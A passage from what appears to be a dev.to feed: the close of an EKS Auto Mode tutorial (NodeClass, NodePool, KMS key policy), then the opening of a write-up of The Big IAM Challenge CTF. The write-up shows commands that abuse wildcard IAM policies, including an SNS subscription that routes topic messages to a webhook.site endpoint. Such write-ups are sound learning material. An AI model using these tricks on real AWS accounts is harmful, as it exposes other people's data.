for extended support), alongside the regular price of the used instances.</p> <p>There's another level to this management -- EKS Auto Mode. It takes cluster management one step further and offloads compute, storage, and load balancing from the user. Let's dive into it.</p> <h2> NodeClass and NodePool </h2> <p>EKS Auto Mode is basically <a href="https://karpenter.sh/" rel="noopener noreferrer">Karpenter</a> integrated into the EKS control plane. Given that Karpenter is written by AWS, I'm surprised it's not included by default, as it's a very helpful tool. Karpenter allows cluster administrators to specify infrastructure definitions based on which it will spin up new instances, should the need arise -- and spin them down as well, which is quite important for the budget.</p> <p>These resources are called NodeClasses and NodePools. There are also NodeClaims, but they are not resources themselves -- rather, they are resource allocation agreements (akin to PersistentVolumeClaims).</p> <h3> NodeClass </h3> <p>A NodeClass describes certain characteristics of the instances we would like to use, such as:</p> <ul> <li>IAM Role to be used by the EC2 instances</li> <li>Network allocation settings (subnets, security groups, network policies)</li> <li>Storage allocation settings (size, throughput, encryption)</li> </ul> <p>You can check the <a href="https://docs.aws.amazon.com/eks/latest/userguide/create-node-class.html#auto-node-class-spec" rel="noopener noreferrer">full resource definition</a> in the AWS EKS documentation.</p> <p>It's worth noting that EKS Auto Mode uses different resource definitions than Karpenter, and the syntax varies quite a lot. Karpenter's EC2NodeClass allows for more granular configuration of the necessary instances, including kubelet settings. The difference between the two, I think, comes from AWS taking this part of the management upon itself.</p> <h3> NodePool </h3> <p>NodePool, on the other hand, stays exactly the same between EKS and Karpenter -- which allows us administrators to look for necessary parameters in the more extensive <a href="https://karpenter.sh/docs/concepts/nodepools/" rel="noopener noreferrer">Karpenter documentation</a>. This resource is responsible for instance type configuration: which instances would we like to use? On which architecture? How much CPU should they have? Do they need a GPU? And just how many instances should we spin up within the scope of this NodePool?</p> <h2> Creating Custom NodeClasses and NodePools </h2> <p>To create our own NodePool, we first need to create our own NodeClass. We can use the NodeClass that already exists in the EKS cluster (it's called <code>default</code>, and this name can't be used again), or we can create our own. For example, we might want to spin up new instances only inside private subnets or encrypt volumes using our own specified KMS key.</p> <p>Here's what the NodeClass definition looks like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="nn">---</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">eks.amazonaws.com/v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">NodeClass</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">mycoolnodeclass</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">role</span><span class="pi">:</span> <span class="s">custom-role-for-ec2-instances</span> <span class="na">subnetSelectorTerms</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">tags</span><span class="pi">:</span> <span class="na">Name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">*private*"</span> <span class="na">kubernetes.io/role/internal-elb</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1"</span> <span class="na">securityGroupSelectorTerms</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">tags</span><span class="pi">:</span> <span class="na">Name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">eks-cluster-sg-*"</span> <span class="na">networkPolicy</span><span class="pi">:</span> <span class="s">DefaultAllow</span> <span class="na">networkPolicyEventLogs</span><span class="pi">:</span> <span class="s">Disabled</span> <span class="na">ephemeralStorage</span><span class="pi">:</span> <span class="na">iops</span><span class="pi">:</span> <span class="m">6000</span> <span class="na">size</span><span class="pi">:</span> <span class="s2">"</span><span class="s">100Gi"</span> <span class="na">kmsKeyID</span><span class="pi">:</span> <span class="s2">"</span><span class="s">arn:aws:kms:us-west-2:123456789012:alias/custom-eks-cluster-kms-key"</span> <span class="na">throughput</span><span class="pi">:</span> <span class="m">250</span> </code></pre> </div> <p>In this NodeClass, we specify that we want to spin up new instances inside the private subnets (automation will map subnet names that have <code>private</code> in their names -- the asterisk allows for wildcard definitions), assign security groups that start with the <code>eks-cluster-sg*</code> string, and attach to each instance a fast and performant storage volume encrypted with our custom key.</p> <p>Now, this part is important.</p> <p>Since we’re using a custom KMS key to encrypt the volumes of the instances, we must add the required permissions to the key. Specifically, nodes should be able to encrypt and decrypt the volumes (duh!), and the cluster should be able to grant nodes access to the key. So the key policy should look something like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"root-access"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Sid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Root access"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AWS"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:iam::123456789012:root"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"kms:*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Sid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow EKS Nodes to use KMS key"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AWS"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"arn:aws:iam::123456789012:role/aws-service-role/autoscaling.amazonaws.com/AWSServiceRoleForAutoScaling"</span><span class="p">,</span><span class="w"> </span><span class="s2">"arn:aws:iam::123456789012:role/aws-service-role/eks.amazonaws.com/AWSServiceRoleForAmazonEKS"</span><span class="p">,</span><span class="w"> </span><span class="s2">"arn:aws:iam::123456789012:role/custom-role-for-ec2-instances"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"kms:Decrypt"</span><span class="p">,</span><span class="w"> </span><span class="s2">"kms:DescribeKey"</span><span class="p">,</span><span class="w"> </span><span class="s2">"kms:Encrypt"</span><span class="p">,</span><span class="w"> </span><span class="s2">"kms:GenerateDataKey*"</span><span class="p">,</span><span class="w"> </span><span class="s2">"kms:ReEncrypt*"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Sid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow EKS Auto Mode to grant access to KMS key"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AWS"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"arn:aws:iam::123456789012:role/eks-cluster-role"</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"kms:CreateGrant"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Bool"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"kms:GrantIsForAWSResource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"true"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Unfortunately for me, I didn’t think of that before debugging why my deployment wasn’t deploying, so here’s a free tip for you. I hope it will help you spend less time than I did.</p> <p>And finally, we come to NodePools.</p> <p>The custom NodePool definition might look like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="nn">---</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">karpenter.sh/v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">NodePool</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">compute</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">template</span><span class="pi">:</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">nodeClassRef</span><span class="pi">:</span> <span class="na">group</span><span class="pi">:</span> <span class="s">eks.amazonaws.com</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">NodeClass</span> <span class="na">name</span><span class="pi">:</span> <span class="s">mycoolnodeclass</span> <span class="na">taints</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">compute"</span> <span class="na">value</span><span class="pi">:</span> <span class="s2">"</span><span class="s">true"</span> <span class="na">effect</span><span class="pi">:</span> <span class="s2">"</span><span class="s">NoSchedule"</span> <span class="na">requirements</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">eks.amazonaws.com/instance-category"</span> <span class="na">operator</span><span class="pi">:</span> <span class="s">In</span> <span class="na">values</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">m"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">c"</span><span class="pi">]</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">eks.amazonaws.com/instance-generation"</span> <span class="na">operator</span><span class="pi">:</span> <span class="s">Gt</span> <span class="na">values</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">4"</span><span class="pi">]</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">eks.amazonaws.com/instance-cpu"</span> <span class="na">operator</span><span class="pi">:</span> <span class="s">In</span> <span class="na">values</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">2"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">4"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">8"</span><span class="pi">]</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">topology.kubernetes.io/zone"</span> <span class="na">operator</span><span class="pi">:</span> <span class="s">In</span> <span class="na">values</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">us-east-1a"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">us-east-1b"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">us-east-1c"</span><span class="pi">]</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">kubernetes.io/arch"</span> <span class="na">operator</span><span class="pi">:</span> <span class="s">In</span> <span class="na">values</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">amd64"</span><span class="pi">]</span> <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s">karpenter.sh/capacity-type</span> <span class="na">operator</span><span class="pi">:</span> <span class="s">In</span> <span class="na">values</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">spot"</span><span class="pi">]</span> <span class="na">disruption</span><span class="pi">:</span> <span class="na">consolidationPolicy</span><span class="pi">:</span> <span class="s">WhenEmptyOrUnderutilized</span> <span class="na">consolidateAfter</span><span class="pi">:</span> <span class="s">30s</span> <span class="na">budgets</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">nodes</span><span class="pi">:</span> <span class="s2">"</span><span class="s">10%"</span> <span class="na">limits</span><span class="pi">:</span> <span class="na">cpu</span><span class="pi">:</span> <span class="m">1000</span> <span class="na">memory</span><span class="pi">:</span> <span class="s">1000Gi</span> </code></pre> </div> <p>In the example above, we specify that we want spot instances of the <code>m</code> or <code>c</code> classes on the <code>amd64</code> architecture, that they should be at least generation 5 (<code>Gt</code> stands for <code>greater than</code>), and located in the <code>us-east-1</code> region. We also specify that the total number of instances for this NodePool should not exceed 1000 CPUs or 1000 GiB of memory.</p> <p>When selecting certain instance types and generations within a specific region, be sure to check that these instances are actually available in that region:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws ec2 describe-instance-type-offerings <span class="se">\</span> <span class="nt">--location-type</span> availability-zone <span class="se">\</span> <span class="nt">--query</span> <span class="s1">'InstanceTypeOfferings[*].[InstanceType,Location]'</span> </code></pre> </div> <p>Some instances, classes, or generations may not be available in one region but might be available in another. It’s always worth checking beforehand, so you won’t spend too much time wondering why your <code>c10i.x124large</code> isn’t coming up in the <code>ap-southeast-5</code> region.</p> <p>I hope this article helps you spin up your custom nodes quickly and saves you both time and mental capacity. I really appreciate that AWS provides such a neat way to control your Kubernetes infrastructure without having to manage it all manually -- almost a win-win scenario.</p> <ol> <li id="fn1"> <p>To be honest, it’s not just application management. EKS brings its own overhead in the form of managing intertwined AWS services (like IAM), but that’s outside the scope of the current article. ↩</p> </li> </ol> aws eks kubernetes Solving The Big IAM Challenge Kirill Sat, 10 May 2025 16:52:29 +0000 https://dev.to/aws-builders/solving-the-big-iam-challenge-39ho https://dev.to/aws-builders/solving-the-big-iam-challenge-39ho <p>CTF (Capture The Flag) challenges are a fun and safe way to stretch a stale brain muscle and learn a trick or two about how robust security is not actually that robust. Today we're going to solve <a href="https://thebigiamchallenge.com/" rel="noopener noreferrer">The Big IAM Challenge</a><sup id="fnref1">1</sup> and reflect on the lessons learned.</p> <h2> Table of Contents </h2> <ul> <li>Table of Contents</li> <li>Intro</li> <li>Challenge 1: Buckets of Fun</li> <li>Challenge 2: <del>Google</del> Analytics</li> <li>Challnge 3: Enable Push Notifications</li> <li>Challenge 4: Admin only?</li> <li>Challenge 5: Do I know you?</li> <li>Challenge 6: One final push</li> <li>Post Mortem</li> </ul> <h2> Intro </h2> <p>The Big IAM Challenge consists of six challenges, each based on a task and an IAM policy. We also have access to a web CLI. With these tools, we will have to find our way to a flag -- a string containing the key that will allow us to progress to the next challenge and, eventually, solve them all.</p> <h2> Challenge 1: Buckets of Fun </h2> <blockquote> <p><strong>Task</strong><br> We all know that public buckets are risky. But can you find the flag?<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">#</span><span class="w"> </span><span class="err">IAM</span><span class="w"> </span><span class="err">policy</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"s3:GetObject"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"s3:ListBucket"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:s3:::thebigiamchallenge-storage-9979f4b"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"StringLike"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"s3:prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"files/*"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>From the existing policy, we can conclude that we have access to a certain bucket. We can retrieve all the objects from this bucket but can only list the contents of the <code>files/</code> directory within it. Let's do that.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws s3 <span class="nb">ls </span>thebigiamchallenge-storage-9979f4b/files/ 2023-06-05 19:13:53 37 flag1.txt 2023-06-08 19:18:24 81889 logo.png </code></pre> </div> <p>And there’s our flag. If we try to download it, we’ll encounter an error indicating that the filesystem is read-only -- which makes sense, but poses an obstacle for us. However, we can overcome this issue by copying the file to stdin and printing it to the console:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws s3 <span class="nb">cp </span>s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt - | <span class="nb">cat</span> <span class="o">{</span>wiz:exposed-storage-risky-as-usual<span class="o">}</span> </code></pre> </div> <p>With this flag, Challenge 1 is complete.</p> <h2> Challenge 2: <del>Google</del> Analytics </h2> <blockquote> <p><strong>Task</strong><br> We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong?<br> Join our queue and get the secret flag.<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">#</span><span class="w"> </span><span class="err">IAM</span><span class="w"> </span><span class="err">policy</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"sqs:SendMessage"</span><span class="p">,</span><span class="w"> </span><span class="s2">"sqs:ReceiveMessage"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>This is the kind of task I can stand behind -- abandon Google's privacywashing, their lust for private data, and their obsession with maximizing profits.</p> <p>From this policy, we can conclude that we're meant to receive a message from the queue. Let's use <code>awscli</code> for that purpose.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws sqs receive-message aws: error: the following arguments are required: <span class="nt">--queue-url</span> </code></pre> </div> <p>To read a message from the queue, we need a queue URL, but we only have an ARN. That’s not a problem -- we can construct one ourselves. Queue URLs follow this format: <code>https://sqs.{region}.amazonaws.com/{account}/{queue_name}</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws sqs receive-message <span class="nt">--queue-url</span> https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 <span class="o">{</span> <span class="s2">"Messages"</span>: <span class="o">[</span> <span class="o">{</span> ... <span class="s2">"Body"</span>: <span class="s2">"{</span><span class="se">\"</span><span class="s2">URL</span><span class="se">\"</span><span class="s2">: </span><span class="se">\"</span><span class="s2">https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html</span><span class="se">\"</span><span class="s2">, </span><span class="se">\"</span><span class="s2">User-Agent</span><span class="se">\"</span><span class="s2">: </span><span class="se">\"</span><span class="s2">Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714</span><span class="se">\"</span><span class="s2">, </span><span class="se">\"</span><span class="s2">IsAdmin</span><span class="se">\"</span><span class="s2">: true}"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <p>No flag here, but we do have a URL pointing to a file in a bucket. Let’s check out that file.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html <span class="o">{</span>wiz:you-are-at-the-front-of-the-queue<span class="o">}</span> </code></pre> </div> <p>Bingo! There’s our flag and another completed challenge.</p> <h2> Challnge 3: Enable Push Notifications </h2> <blockquote> <p><strong>Task</strong><br> We got a message for you. Can you get it?<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">#</span><span class="w"> </span><span class="err">IAM</span><span class="w"> </span><span class="err">policy</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2008-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Statement1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Sid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Statement1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"AWS"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"SNS:Subscribe"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"StringLike"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"sns:Endpoint"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*@tbic.wiz.io"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The policy clearly wants us to subscribe to this SNS topic. I’d be happy to oblige! Since we have a wildcard (<code>*</code>) before <code>@tbic.wiz.io</code>, it means we can use any email!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws sns subscribe <span class="nt">--topic-arn</span> arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications <span class="nt">--protocol</span> email <span class="nt">--notification-endpoint</span> hello@tbic.wiz.io <span class="o">{</span> <span class="s2">"SubscriptionArn"</span>: <span class="s2">"pending confirmation"</span> <span class="o">}</span> </code></pre> </div> <p>And now we wait.</p> <p>Wait, what? Wait for what? How do I confirm the subscription to the topic if I have no access to the email? Looks like I fell into the easiest trap!</p> <p>Okay, let’s think. Since we don’t have access to email, we need to figure out another way to receive a message from the topic. How can we do that? What are the options to receive messages from SNS? We can use the following protocols to communicate with SNS: HTTP, HTTPS, email, email-json, SMS, SQS, application, Lambda, and Firehose. What if we set up an HTTP endpoint to receive messages? Webhooks, here we go! Luckily, there are <a href="https://webhook.site" rel="noopener noreferrer">services</a> online that allow us to test webhook requests. The trick here is to take the unique webhook URL and add the required endpoint string to the end of the URL: <code>https://webhook.site/3bddcb48-f58d-4284-a731-491c8784e0b1/@tbic.wiz.io</code>. Still a valid URL? Let’s find out!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> aws sns subscribe <span class="nt">--topic-arn</span> arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications <span class="nt">--protocol</span> https <span class="nt">--notification-endpoint</span> https://webhook.site/3bddcb48-f58d-4284-a731-491c8784e0b1/@tbic.wiz.io <span class="o">{</span> <span class="s2">"SubscriptionArn"</span>: <span class="s2">"pending confirmation"</span> <span class="o">}</span> </code></pre> </div> <p>In a couple of seconds, we receive a message with the configuration URL. Copy and paste it into the browser to confirm the subscription. After several more seconds, we see a new message in the webhook site interface with the flag itself!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="nl">"Message"</span><span class="p">:</span><span class="w"> </span><span class="s2">"{wiz:always-suspect-asterisks}"</span><span class="p">,</span><span class="w"> </span><span class="err">...</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Third challenge is done -- way to go!</p> <h2> Challenge 4: Admin only? </h2> <blockquote> <p><strong>Task</strong><br> We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">#</span><span class="w"> </span><span class="err">IAM</span><span class="w"> </span><span class="err">policy</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"s3:GetObject"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Principal"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"s3:ListBucket"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"StringLike"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"s3:prefix"</span><span class="p">:</span><span class="w"> </span><span class="s2">"files/*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"ForAllValues:StringLike"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"aws:PrincipalArn"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:iam::133713371337:user/admin"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The provided IAM policy clearly states that listing files in a bucket is only allowed for a user with the <code>admin</code> role. However, there's also a loophole: anyone can download files from the bucket. This is a very bad practice and a huge security risk. From these statements, we can conclude that the bucket has at least a <code>files/</code> directory, and we can view it by accessing the HTTP endpoint of the bucket.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">&gt;</span> curl <span class="s2">"https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321?prefix=files/"</span> &lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">"UTF-8"</span>?&gt; &lt;ListBucketResult <span class="nv">xmlns</span><span class="o">=</span><span class="s2">"http://s3.amazonaws.com/doc/2006-03-01/"</span><span 